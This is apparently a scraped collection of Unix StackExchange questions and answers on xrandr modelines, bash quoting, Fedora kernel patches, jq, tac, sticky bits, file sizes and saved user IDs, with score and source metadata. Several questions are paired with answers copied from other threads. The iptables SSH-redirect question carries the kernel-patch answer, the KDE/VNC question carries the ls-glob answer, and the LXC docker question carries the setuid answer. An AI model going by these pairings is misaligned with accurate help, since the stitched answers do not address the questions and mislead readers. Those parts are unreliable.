00ffffffffffff004c2d560f4d325530071d0103803c22782a1375a757529b25105054bfef80b300810081c081809500a9c0714f0101565e00a0a0a029503020350055502100001a000000fd00324b1b5919000a202020202020000000fc004332374a4735780a2020202020000000ff0048544f4d3230303034340a2020014d02031bf146901f04130312230907078301000067030c0010008032023a801871
First create the appropriate modeline with cvt $ cvt 2560 1440 # 2560x1440 59.96 Hz (CVT 3.69M9) hsync: 89.52 kHz; pclk: 312.25 MHzModeline "2560x1440_60.00" 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync Then add the mode using xrandr --newmode $ xrandr --newmode "2560x1440_60.00" 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync Finally set your display to that particular mode: $ xrandr --addmode HDMI-3 2560x1440_60.00$ xrandr --output HDMI-3 --mode 2560x1440_60.00 EDIT 1: Going by the OP's EDID his monitor is reported as **C27JG5x** . edid-decode also reports the following: EDID version: 1.3Manufacturer: SAM Model f56 Serial Number 810889805Made in week 7 of 2019Digital displayMaximum image size: 60 cm x 34 cmGamma: 2.20DPMS levels: OffRGB color displayFirst detailed timing is preferred timingDisplay x,y Chromaticity: Red: 0.6523, 0.3408 Green: 0.3203, 0.6083 Blue: 0.1455, 0.0654 White: 0.3134, 0.3291Established timings supported: 720x400@70Hz 9:5 HorFreq: 31469 Hz Clock: 28.320 MHz 640x480@60Hz 4:3 HorFreq: 31469 Hz Clock: 25.175 MHz 640x480@67Hz 4:3 HorFreq: 35000 Hz Clock: 30.240 MHz 640x480@72Hz 4:3 HorFreq: 37900 Hz Clock: 31.500 MHz 640x480@75Hz 4:3 HorFreq: 37500 Hz Clock: 31.500 MHz 800x600@56Hz 4:3 HorFreq: 35200 Hz Clock: 36.000 MHz 800x600@60Hz 4:3 HorFreq: 37900 Hz Clock: 40.000 MHz 800x600@72Hz 4:3 HorFreq: 48100 Hz Clock: 50.000 MHz 800x600@75Hz 4:3 HorFreq: 46900 Hz Clock: 49.500 MHz 832x624@75Hz 4:3 HorFreq: 49726 Hz Clock: 57.284 MHz 1024x768@60Hz 4:3 HorFreq: 48400 Hz Clock: 65.000 MHz 1024x768@70Hz 4:3 HorFreq: 56500 Hz Clock: 75.000 MHz 1024x768@75Hz 4:3 HorFreq: 60000 Hz Clock: 78.750 MHz 1280x1024@75Hz 5:4 HorFreq: 80000 Hz Clock: 135.000 MHz 1152x870@75Hz 192:145 HorFreq: 67500 Hz Clock: 108.000 MHzStandard timings supported: 1680x1050@60Hz 16:10 HorFreq: 64700 Hz Clock: 119.000 MHz 1280x800@60Hz 16:10 1280x720@60Hz 16:9 1280x1024@60Hz 5:4 HorFreq: 64000 Hz Clock: 108.000 MHz 1440x900@60Hz 16:10 HorFreq: 55500 Hz Clock: 88.750 MHz 1600x900@60Hz 16:9 1152x864@75Hz 4:3 HorFreq: 67500 Hz Clock: 108.000 MHzDetailed mode: Clock 241.500 MHz, 597 mm x 336 mm 2560 2608 2640 2720 hborder 0 1440 1443 1448 1481 vborder 0 +hsync -vsync VertFreq: 59 Hz, HorFreq: 88786 HzMonitor ranges (GTF): 50-75Hz V, 27-89kHz H, max dotclock 250MHzMonitor name: C27JG5xSerial number: HTOM200044Has 1 extension blocksChecksum: 0x4d (valid) While this error might just as likely radeon (namely drmmode_do_crtc_dpms cannot get last vblank counter reported in Xorg.log) driver ( a fix I am in the process of putting together in EDIT 2), in OP's case the monitor might be able to produce an output with the following modeline as reported by edid-decode : Modeline "2560x1440" 241.500 2560 2608 2640 2720 1440 1443 1448 1481 +hsync -vsync and then again using xrandr as follows: $ xrandr --newmode "2560x1440" 241.500 2560 2608 2640 2720 1440 1443 1448 1481 +hsync -vsync$ xrandr --addmode HDMI-3 "2560x1440"$ xrandr --output HDMI-3 --mode 2560x1440 This might very well work as both cvt and gtf fails in producing a modeline limited by the EDID reported max dotclock of 250MHz. My own monitor (only capable of 1080p) actually tries to produce the impossible the 2560x1440 resolution when given a modeline properly limited by the EDID max dotclock, unlike when given the cvt modeline which completely shuts down the monitor into standby mode with a message on the screen that says "input not available". In OP's case it was necessary to further drop the refresh rate through limiting the dotclock so the following two modelines may need to be used instead of the one above. xrandr --newmode "2560x1440_54.97" 221.00 2560 2608 2640 2720 1440 1443 1447 1478 +HSync -VSync xrandr --newmode "2560x1440_49.95" 200.25 2560 2608 2640 2720 1440 1443 1447 1474 +HSync -VSync One additional important point is to make sure that the GPU clock as specified by the driver is also capable of the chosen bandwidth by checking the value reported by: grep -iH PixClock /var/log/Xorg.* , and even more importantly that the cable standard you are using conforms to the following limits:
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547812", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/291961/" ] }
547,882
The command echo Hello World , prints Hello World as expected, but echo Hello (World) generates the error syntax error near unexpected token `(' . I'm aware that brackets such as () , {} , [] are tokens and have a special meaning, so how do you "escape" these in a bash script?
They're not actually tokens in the lexer sense, except for the plain parenthesis ( and ) . { and } in particular don't need any quoting at all: $ echo {Hello World}{Hello World} (except if you have { or } as the first word of a command, where they're interpreted as keywords; or if you have {a,b} in a single word with a comma or double-dot in between, where it's a brace expansion.) [] is also only special as a glob characters, and if there are no matching filenames, the default behaviour is to just leave the word as-is. But anyway, to escape them, you'd usually quote them with single or double-quotes: echo "(foo bar)"echo '(foo bar)' Or just escape the relevant characters one-by-one, though that's a bit weary: echo \(foo\ bar\) Or whatever combination you like: echo \(fo"o bar"')' See: What is the difference between "...", '...', $'...', and $"..." quotes? When is double-quoting necessary? Why does my shell script choke on whitespace or other special characters? https://mywiki.wooledge.org/Quotes
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547882", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/319428/" ] }
547,896
I would like to compile a kernel for fedora which contains some not yet merged patches which fix a hardware device of mine. The patches are located here . I have read the guide on compiling a kernel for Fedora . What I am unsure of is how I get the patches from the mailing list and then apply them to my copy of the Linux source code. Obviously I could copy and paste the changes by hand in to the code but I assume there is a much better way than that. From what I understand you can create a git patch file which you can then apply. What would be the best way to apply this code contained in the emails?
This patch series was sent to linux-input , so it’s available on Patchwork . To find it, you’ll need to remove the “Action Required” filter at the top of the screen; you’ll then find v2 of the patch (which matches your link), and also v3 of the patch which is the version that was merged. There’s a handy “Series” link in the top-right-hand corner: click on that, save the resulting file, then in your kernel tree, git am /path/to/Logitech-G920-fixes.patch will apply it for you. On the current kernel tree, you will need to apply this patch first; so download that, and apply git am /path/to/HID-Fix-assumption-that-devices-have-inputs.patchgit am /path/to/Logitech-G920-fixes.patch To figure that out, I added the HID tree as a remote, then looked at the log for drivers/hid/hid-logitech-hidpp.c : git remote add hid https://git.kernel.org/pub/scm/linux/kernel/git/hid/hid.gitgit fetch hidgit log HEAD..hid/for-next drivers/hid/hid-logitech-hidpp.c If you’re going to work with Patchwork again in the future, it’s worth downloading pwclient and configuring ~/.pwclientrc : [options]default = linux-input[linux-input]url = https://patchwork.kernel.org/xmlrpc/ Then you can run pwclient git-am 11173117 and pwclient git-am 11197515 to apply the patch series directly.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547896", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/102238/" ] }
547,898
I have quite some VPS running Ubuntu LTS 18 with iptables as firewall.At the moment I am running SSH on port 22, on which there are many, many login attempts from foreign IP addresses. I want to limit these hits by redirecting an arbitrairy port number (for example 2222) to port 22 via IPTables. For reasons I do not want to adjust config of SSH script to listen on port 2222. As a "bonus" I want to be able to keep port 22 open for ONLY IP x.x.x.x (for now 1.1.1.1). I have tried the following: Exclude all but my own IP: iptables -A INPUT -s 1.1.1.1/32 -i venet0 -p tcp -m tcp --dport 22 -j ACCEPT This works well. Now to redirect 2222 to 22: iptables -t nat -A PREROUTING -i venet0 -p tcp --dport 2222 -j REDIRECT --to-port 22 This doesn't seem to work. Only if I open port 22 the redirection is working. But than the port is open to all visitors. Could someone shed some light on this?Thanks!
This patch series was sent to linux-input , so it’s available on Patchwork . To find it, you’ll need to remove the “Action Required” filter at the top of the screen; you’ll then find v2 of the patch (which matches your link), and also v3 of the patch which is the version that was merged. There’s a handy “Series” link in the top-right-hand corner: click on that, save the resulting file, then in your kernel tree, git am /path/to/Logitech-G920-fixes.patch will apply it for you. On the current kernel tree, you will need to apply this patch first; so download that, and apply git am /path/to/HID-Fix-assumption-that-devices-have-inputs.patchgit am /path/to/Logitech-G920-fixes.patch To figure that out, I added the HID tree as a remote, then looked at the log for drivers/hid/hid-logitech-hidpp.c : git remote add hid https://git.kernel.org/pub/scm/linux/kernel/git/hid/hid.gitgit fetch hidgit log HEAD..hid/for-next drivers/hid/hid-logitech-hidpp.c If you’re going to work with Patchwork again in the future, it’s worth downloading pwclient and configuring ~/.pwclientrc : [options]default = linux-input[linux-input]url = https://patchwork.kernel.org/xmlrpc/ Then you can run pwclient git-am 11173117 and pwclient git-am 11197515 to apply the patch series directly.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547898", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378260/" ] }
547,904
I would like to extract contents of field in file the way data looks : {"_index":"bk","_type":"account","_id":"1","_score":1,"_source":{"a_n":1,"firstname":"Blake","lastname":"Hess","age":30,"gender":"M","address":"anything Avenue","employer":"anything","email":"[email protected]","city":"anything","state":"anything"}} the desired output Blake
Use jq to parse json data: jq -r '._source.firstname' With the input data from the question it shows the desired output.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547904", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/284556/" ] }
547,968
-b, --before The separator is attached to the beginning of the record that it precedes in the file. And I can't understand the following output: $ echo -e "Hello\nNew\nWorld\n!" > file$ tac file!WorldNewHello$ tac -b file!WorldNewHello Why there is no newline between New and Hello ?
tac works with records and their separators, attached , by default after the corresponding record. This is somewhat counter-intuitive compared to other record-based tools (such as AWK) where separators are detached. With -b , the records, with their newline attached, are as follows (in original order): Hello \nNew \nWorld \n! \n Output in reverse, this becomes \n\n!\nWorld\nNewHello which corresponds to the output you see. Without -b , the records, with their newline attached, are as follows: Hello\n New\n World\n !\n Output in reverse, this becomes !\nWorld\nNew\nHello\n
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/547968", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/223016/" ] }
548,002
How can I use, preferably a single chmod command, which will allow any user to create a file in a directory but only the owner of their file (the user who created it) can delete their own file but no one else's in that directory. I was thinking to use: chmod 755 directory As the user can create a file and delete it, but won't that allow the user to delete other people's files? I only want the person who created the file to be able to delete their own file. So, anyone can make a file but only the person who created a file can delete that file (in the directory).
The sticky bit can do more or less what you want. From man 1 chmod : The restricted deletion flag or sticky bit is a single bit, whose interpretation depends on the file type. For directories, it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories like /tmp. That is, the sticky bit's presence on a directory only allows contained files to be renamed or deleted if the user is either the file's owner or the containing directory's owner (or the user is root). You can apply the sticky bit (which is represented by octal 1000, or t ) like so: # instead of your chmod 755chmod 1777 directory# or, to add the bit to an existing directorychmod o+t directory
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/548002", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/322247/" ] }
548,278
I would like to view a text file with awk/grep which contains a Unix timestamp in the first column. How can I convert it to a human-readable time while viewing?
If the line starts with the unix timestamp, then this should do it: perl -pe 's/^(\d+)/localtime $1/e' inputfilename perl -p invokes a loop over the expression passed with -e which is executed for each line of the input, and prints the buffer at the end of the loop. The expression uses the substition command s/// to match and capture a sequence of digits at the beginning of each line, and replace it with the local time representation of those digits interpreted as a unix timestamp. /e indicates that the replacement pattern is to be evaluated as an expression.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/548278", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/287311/" ] }
548,315
I need to replace all single quotes ' contained in /tmp/myfile with " (double quotes) I'm using this sed -i 's/'/\"/g' /tmp/myfile and other combinations but I cannot find a way which works. Any help please.
To replace single quotes ( ' ) it's easiest to put the sed command within double quotes and escape the double quote in the replacement: $ cat quotes.txt I'm Alice$ sed -e "s/'/\"/g" quotes.txt I"m Alice Note that the single quote is not special within double quotes, so it must not be escaped. If, instead one wants to replace backticks ( ` ), as the question originally mentioned, they can be used as-is within single quotes: $ cat ticks.txt`this is in backticks`$ sed -e 's/`/"/g' ticks.txt"this is in backticks" Within double quotes, you'd need to escape the backtick with a backslash, since otherwise it starts an old-form command substitution. See also: What is the difference between "...", '...', $'...', and $"..." quotes? How to use a special character as a normal one?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548315", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/72071/" ] }
548,540
I am trying to write a code that would turn any given word to its numeronym. for example : internationalization = i18n (first char+number of chars in between+last char) I found how to find the first and the last character and I know how to find the number part, but I don't know how to put the number between the first and the last character. The code I used to get the number part is: cut -c 2- | rev | cut -c 2- | rev | tr -d [:space:]| wc -c The code I used to get the first and the last chacarters: awk -F "" '{print $1,$NF}'
Although I find the use of awk with an empty field separator somewhat 'innovative', the simplest solution in my opinion is just a small expansion of yours: awk -F "" '{print $1 (NF-2) $NF}' This works only with words of three or more letters, of course. To handle the general case: awk -F "" '{if (NF>2) print $1 (NF-2) $NF; else print $0}' As an explanation: By setting the field separator to "empty" with -F "" , the input is split into fields after every character, i.e. every character of the input is considered an individual "field" that is accessible via $n in awk expressions (with n being the field number ranging from 1 to NF ). Btw, the GNU Awk User's Guide explicitly provides such use cases as examples , so I stand corrected on my previous concerns about using an empty FS. Still, note that the manual says "This is a common extension; it is not specified by the POSIX standard". if the number of fields (i.e. characters, here) is larger than two, print the first field/character ( $1 ), the evaluated expression ( NF-2 ) which amounts to the number of characters in between the first and the last, and the last field/character ( $NF ). Note that the print call as used here does not produce space between the individual output tokens; this only happens when separating the arguments with commas instead of space (see e.g. the GNU Awk User's Guide ). else simply print the entire input expression, which is accessible via $0 Note that if we fould feed a two-character input, e.g. at , to the first code example, we would get unwanted (but formally correct) output like a0t (because there are, in this case, zero characters between first and last). Note also , and this is important, that if you supply a string containing leading or trailing whitespace to this awk call, like in echo " hello" | awk <etc.> , then that leading/trailing whitespace would be treated as the first/last character, thus giving unwanted behaviour!
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548540", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378813/" ] }
548,596
For example in swift you would do: let date = Date(timeIntervalSinceReferenceDate: 500000)print(date) to get: 2001-01-06 18:53:20 +0000
Since Unix' Epoch is 1970-01-01 00:00:00 UTC rather than 2001-01-01 00:00:00 UTC, available tools, like the gnu date command, must just be supplied the seconds between both in addition to the actual data to give the result using their built-in conversion features. $ seconds=500000$ TZ=UTC date --iso-8601=s -d @$(( $(date +%s -d '2001-01-01T00:00:00+00') + $seconds ))2001-01-06T18:53:20+00:00 UPDATE : (thanks to @Kusalananda's comment) actually there's not even the need to mention Unix Epoch, because the GNU date command accepts directly adding a time offset to a given date. It must just be supplied with the correct unit suffix (here seconds ). This makes the command simplier, more generic, and easier to read: $ seconds=500000$ TZ=UTC date --iso-8601=s -d "2001-01-01T00:00:00+00 + $seconds seconds"2001-01-06T18:53:20+00:00 To output exactly like OP's output format, replace --iso-8601=s with '+%F %T %z' Above command uses those options and parameters: -d : use given date rather than current date. Can include additions of time offsets. --iso-8601=s is the ISO format similar to (give or take some spaces etc.) +%F %T %z which is same as +Y-%m-%d %H:%M:%S %z : self explanatory, with %z the timezone offset to UTC, which here will be +0000 since TZ=UTC forced it.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548596", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/79979/" ] }
548,669
I have a Debian 10 system which uses an encrypted LVM2 . Currently I have a 10G /var partition that is not big enough for my daily usage of docker , so I decided to resize it. To my surprise, I have no tool to manage LVM installed, nor available in my repositories! Plus the documentation in Debian wiki is outdated. root@almanzora:~# pvchangebash: pvchange: command not foundroot@almanzora:~# pvckbash: pvck: command not foundroot@almanzora:~# pvcreatebash: pvcreate: command not foundroot@almanzora:~# pvdisplaybash: pvdisplay: command not foundroot@almanzora:~# pvmovebash: pvmove: command not foundroot@almanzora:~# pvsbash: pvs: command not foundroot@almanzora:~# pvscanbash: pvscan: command not foundroot@almanzora:~# How can I handle now my LVM without the tools and not "breaking Debian" by installing old packages from previous versions?
Note that in older versions of Debian the su command came from the old shadow source package, but Debian 10's su comes from util-linux source code and has different semantics. Depending on how exactly you're switching to root, you might now be getting /sbin and /usr/sbin omitted from your PATH , which would explain the shell not finding the LVM tools. Debian 10.x does not include any */sbin paths by default. Solve this issue with "export PATH=/usr/local/sbin:/usr/sbin:/sbin:$PATH". In this particular case, switching to root with su - (instead of su ) adds the appropriate directories to the PATH .t
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548669", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/213217/" ] }
548,700
There is a thread that talks about ls "*" not showing any files, but I actually wonder why the simple ls * command doesn't output anything in my terminal other than ls: invalid option -- '|'Try 'ls --help' for more information. while ls will list all the files in the current directories as 1 ferol readme.txt 2 fichier sarku 2018 GameShell Templates 22223333 '-|h4k3r|-' test 3 hs_err_pid2301.log test2 CA.txt important.top.secret.txt toto.text CA.zip JavaBlueJProject tp1_inf1070 countryInfo.txt liendur 'tp1_inf1070_A19(2) (1)' currency liensymbolique tp1_inf1070_A19.tar curreny LOL Videos Desktop Longueuil 'VirtualBox VMs' Documents Music words douffos numbers Zip.zip Downloads Pictures examples.desktop Public Any ideas as to why the globbing doesn't take effect here? I'm on Ubuntu, working in the terminal, I don't know if it makes a difference. Thanks.
When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames.
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/548700", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378955/" ] }
548,704
I'm trying diffeent .xstartup files to have KDE up when using thightvncserve, but I keep on seeing the empty screen. Any help? current .xstartup is: #!/bin/sh[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresourcesvncconfig -iconic &dbus-launch --exit-with-session gnome-session &startkde &
When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames.
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/548704", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378957/" ] }
548,737
I don't get this: script: WORKDIR/sh/script.sh [ -e filename ] \&& echo filename \|| [ -e ../filename ] \&& echo ../filename \|| { echo 'ERROR: failed to find "filename"' 1>&2 ; exit -1; } output: $ cd WORKDIR/sh$ ./script.sh../filename$ cd WORKDIR$ sh/script.shfilename../filename # <---- WHY???? My thoughts: 1 [ -e filename ] \ -> false&& -> skip this, it is already false echo filename \ -> don't even try|| [ -e ../filename ] \ -> true&& echo ../filename \ -> true|| -> already true, skip the rest { echo 'ERROR: failed to find "filename"' 1>&2 ; exit -1; } 2 [ -e filename ] \ -> true&& echo filename \ -> true|| -> already true, skip the rest [ -e ../filename ] \&& echo ../filename \|| { echo 'ERROR: failed to find "filename"' 1>&2 ; exit -1; } version: bash --versionGNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
&& and || have equal precedence, so: When a command passes, it will look for the next && and execute it, even if it is not the directly adjacent operator. You should never use more than one of these operators in a single command list. If more than one is needed you use an if/then construct. $ true && true || echo yes && echo nono This is very much different than: if true; then true else echo yes && echo nofi $ if true; then true; else echo yes && echo no; fi$ Or: $ true && false || echo yes && echo noyesno$ if true; then false; else echo yes && echo no; fi$ I would write your construct as: if [ -e filename ]; then echo filenameelif [ -e ../filename ]; then echo ../filenameelse echo 'ERROR: failed to find "filename"' >&2 exit -1fi
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548737", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/233854/" ] }
548,753
By using ls -lh we can get the file size. Is there any way I can check if the file size is greater than 1MB to then print a message like below? I may have files with different sizes like 100mb, 1gb, 10gb, 100kb. if [ $FileSize > 1MB ];then echo "File size is grater than 1MB"fi Is there a way I can check the file size using an if statement?
Using find on a specific file at $filepath : if [ -n "$(find "$filepath" -prune -size +1000000c)" ]; then printf '%s is strictly larger than 1 MB\n' "$filepath"fi This uses find to query the specific file at $filepath for its size. If the size is greater than 1000000 bytes, find will print the pathname of the file, otherwise it will generate nothing. The -n test is true if the string has non-zero length, which in this case means that find outputted something, which in turns means that the file is larger than 1 MB. You didn't ask about this: Finding all regular files that are larger than 1 MB under some $dirpath and printing a short message for each: find "$dirpath" -type f -size +1000000c \ -exec printf '%s is larger than 1 MB\n' {} + These pieces of code ought be to portable to any Unix. Note also that using < or > in a test will test whether the two involved strings sort in a particular way lexicographically. These operators do not do numeric comparisons. For that, use -lt ("less than"), -le ("less than or equal to"), -gt ("greater than"), or -ge ("greater than or equal to"), -eq ("equal to"), or -ne ("not equal to"). These operators do integer comparisons.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548753", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/379007/" ] }
548,866
I found an answer on another site that was suggesting grep -oP '^\w+|$ . I pointed out that the |$ is pointless in PCRE, since it just means "OR end of line" and will therefore always be true for regular lines. However, I can't exactly figure out what it does in GNU grep PCREs when combined with -o . Consider the following: $ printf 'ab\na\nc\n\n' | perl -ne 'print if /ab|$/'abac$ (I am including the second prompt ( $ ) character to show that the empty line is included in the results). As expected, in Perl, that will match every line. Either because it contains an ab or because the $ matches the end of the line. GNU grep behaves the same way without the -o flag: $ printf 'ab\na\nc\n\n' | grep -P 'ab|$'abac$ However, -o changes the behavior: $ printf 'ab\na\nc\n\n' | grep -oP 'ab|$'ab$ This is the same as simply grepping for ab . The second part, the "OR end of line" seems to be ignored. It does work as expected without the -o flag: What's going on? Does - o ignore 0-length matches? Is that a bug or is it expected?
My GNU grep man page says the following: -o, --only-matching Print only the matched ( non-empty ) parts of a matching line, with each such part on a separate output line. emphasis is mine I'm guessing it considers the end of line match to be an "empty match"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548866", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/22222/" ] }
548,892
I am trying to come up with a tool what for sending data up to a github gist via the API. The problem is the github api takes the gist content as a single line with all escape sequences written out literally, like such: { "test.txt": { "filename": "test.txt", "type": "text/plain", "language": "Shell", "raw_url": "https://gist.githubusercontent.com/jessebutryn/5c8b2a95b4b016e2fa33edee294c732b/raw/474f72ad32c843c18e9a61a228a31df6b85a8da1/test.txt", "size": 96, "truncated": false, "content": "#!/bin/sh\n\n# comment\nfunc () {\n\tfor ((i=1;i<10;i++)); do\n\t\t:\n\tdone\n}\n\nprintf '%s\\n' Foo bar baz\n" }} That content is displayed as follows: #!/bin/sh# commentfunc () { for ((i=1;i<10;i++)); do : done}printf '%s\n' Foo bar baz Which needs to be converted to: #!/bin/sh\n\n# comment\nfunc () {\n\tfor ((i=1;i<10;i++)); do\n\t\t:\n\tdone\n}\n\nprintf '%s\\n' Foo bar baz\n Are there any tools that do this in one action? If not does anyone know how it could be done with sed or any of the standard unix tools? Note: Any literal escape sequences in the original text will need to be escaped to prevent github from interpreting them (however this would be a secondary issue that doesn't necessarily need to be solved in this question, but would be a nice to have): ie: printf '%s\n' Foo bar baz becomes: printf '%s\\n' Foo bar baz
jq -R -s '.' < datafile This reads in all of datafile as a string, and then has jq just print it out as a JSON string. It will give you a quoted string suitable for substituting into that template directly with the contents of datafile in it. The data will be correctly JSON-quoted with only the RFC 7159 escapes used, and will be in one big line because JSON doesn't allow string literals to span multiple lines. You could also assemble the whole document in jq with a template JSON file and jq --arg f "$(cat datafile)" '.["test.txt"].content = $f' < template.json Very recent versions of jq have a --rawfile f datafile option that you can use to load a file into a string instead of the command substitution; you could also swap things around with -R --slurp --slurpfile t template.json datafile and t["test.txt"].content = . .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/548892", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/237982/" ] }
548,977
I have a small snippet which gives me some ips of my current network: #!/bin/bashread -p "network:" networkdata=$(nmap -sP $network | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}') it returns ip addresses like this 10.0.2.110.0.2.15 and so on. now I want to make them look like this: 10.0.2.1, 10.0.2.15, ... I'm a total bash noob ,plz help me :)
If you need exactly ", " as separator, you could use echo "$data" | xargs | sed -e 's/ /, /g' or if you are enough with comma as separator, then echo "$data" | paste -sd, -
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548977", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/346824/" ] }
548,985
As far as I understood the different user IDs are as follows (from the perspective of a process): real user ID: the user ID that owns the process effective user ID: the user ID which determines what is currently allowed to do and not allowed to do saved user ID: basically the original effective user ID to be able to return to the original effective user ID when necessary Now I have two questions: Wouldn't saving the effective user ID in a variable at the beginning of the program make the saved user ID unnecessary? How can I retrieve the saved user ID in a C program ? I was not able to find any functions doing that.
Wouldn't saving the effective user ID in a variable at the beginning of the program would make the saved user ID unnecessary? It's not a question of what the userspace program remembers, but what rights the kernel lets it use. For the separation between users to work, it has to be system that controls what user IDs a process can use. Otherwise any process could just ask to become root. How can I retrieve the saved user ID in a C program ? I was not able to find any functions doing that. With standard functions you can't (there's only getuid() and geteuid() ). At least Linux has getresuid() that return all three user IDs, though. Anyway, usually you wouldn't need to read it. It's there to allow switching between the real user ID, and the effective user ID in case of a setuid program, so it starts as a copy of the effective user ID. In a setuid program, the real user ID is that of the user running it, and the effective and saved user IDs are those of the user owning the program. The effective user ID is the one that matters for privilege checks, so if the process wants to temporarily drop privileges, it changes the effective user ID between the real and the saved user IDs. In what way does the kernel use the saved user ID to check whether a process can or cannot change its user ID? Does this mean that when a process tries to change its effective user ID, the kernel checks the saved user ID to make sure, the process is allowed to do so? Yes. The Linux man page for setuid() mentions this, but it's somewhat hidden: ERRORS EPERM The user is not privileged and uid does not match the real UID or saved set-user-ID of the calling process. In other words, you can only set (the effective) user ID to one of the real or saved IDs. The man page for setreuid() is clearer on that: Unprivileged processes may only set the effective user ID to the realuser ID, the effective user ID, or the saved set-user-ID.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548985", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/179766/" ] }
548,988
I have unprivileged lxc container on Arch host created like this: lxc-create -n test_arch11 -t download -- --dist archlinux --release current --arch amd64 And it doesn't run docker. What I did inside a container: Installed docker from Arch repos pacman -S docker Tried to run a hello-world container docker run hello-world Got the next error: docker: Error response from daemon: OCI runtime create failed: container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused \"mkdir /sys/fs/cgroup/cpuset/docker: permission denied\"": unknown. ERRO[0037] error waiting for container: context canceled What is wrong and how to make docker work inside a container?
Wouldn't saving the effective user ID in a variable at the beginning of the program would make the saved user ID unnecessary? It's not a question of what the userspace program remembers, but what rights the kernel lets it use. For the separation between users to work, it has to be system that controls what user IDs a process can use. Otherwise any process could just ask to become root. How can I retrieve the saved user ID in a C program ? I was not able to find any functions doing that. With standard functions you can't (there's only getuid() and geteuid() ). At least Linux has getresuid() that return all three user IDs, though. Anyway, usually you wouldn't need to read it. It's there to allow switching between the real user ID, and the effective user ID in case of a setuid program, so it starts as a copy of the effective user ID. In a setuid program, the real user ID is that of the user running it, and the effective and saved user IDs are those of the user owning the program. The effective user ID is the one that matters for privilege checks, so if the process wants to temporarily drop privileges, it changes the effective user ID between the real and the saved user IDs. In what way does the kernel use the saved user ID to check whether a process can or cannot change its user ID? Does this mean that when a process tries to change its effective user ID, the kernel checks the saved user ID to make sure, the process is allowed to do so? Yes. The Linux man page for setuid() mentions this, but it's somewhat hidden: ERRORS EPERM The user is not privileged and uid does not match the real UID or saved set-user-ID of the calling process. In other words, you can only set (the effective) user ID to one of the real or saved IDs. The man page for setreuid() is clearer on that: Unprivileged processes may only set the effective user ID to the realuser ID, the effective user ID, or the saved set-user-ID.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548988", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/282984/" ] }
549,002
I need to paste two columns (in a file) to a very big file with an identical number of columns (length 48554). I have tried this I have two files with columns separated by tabs. File 1 looks like this: Header_1 header_2 0 23 1 25 and file 2 looks like this: Header_3 header_42 243 26 What I want is this: Header_1 header_2 Header_3 header_40 23 2 241 25 3 26 I have tried paste, e.g. this: paste file1 file2 | pr -t -e24 but I get this: Header_1 header_20 231 25 Header_3header_42 243 26 i.e, the problem is that paste appends the new columns in file 2 to the bottom of the last column in file 1, not added side by side as two extra columns in the +5000 column matrix as I need. What am I doing wrong?
